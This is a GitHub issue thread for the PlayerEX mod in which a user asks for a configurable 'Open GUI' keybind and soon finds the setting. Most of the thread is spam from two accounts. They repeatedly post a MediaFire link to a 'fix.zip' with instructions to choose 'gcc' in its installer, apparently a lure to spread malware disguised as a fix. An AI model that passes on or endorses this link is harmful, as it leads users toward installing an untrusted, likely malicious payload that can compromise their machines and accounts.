### ISSUE TITLE
[Feature] Change `OPEN GUI` Button within Controls menu

### ISSUE THREAD

**Issue by TheShadyyOneYT** [PlayerEXDirectorsCut/playerex#44]
### What is your feature request?

I'm not a huge fan of the button of it being automatically set to "R". and i didn't find another way to change it, and it doesn't appear in the controls menu. Is it possible to add it to the controls menu so I can change what button opens the GUI of my and other people's choosing?

### What type of change is this?

- [ ] Visual
- [ ] Features/Mechanics
- [ ] Performance
- [X] Compat
- [X] Others

**Comment by TheShadyyOneYT** [comment]
iim a dumbass nvm i found it

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by TheShadyyOneYT** [comment]
> Download https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file In the installer menu, select "gcc."

I found it via another method but thank you

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by TheShadyyOneYT** [comment]
> Download https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file In the installer menu, select "gcc."

no

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
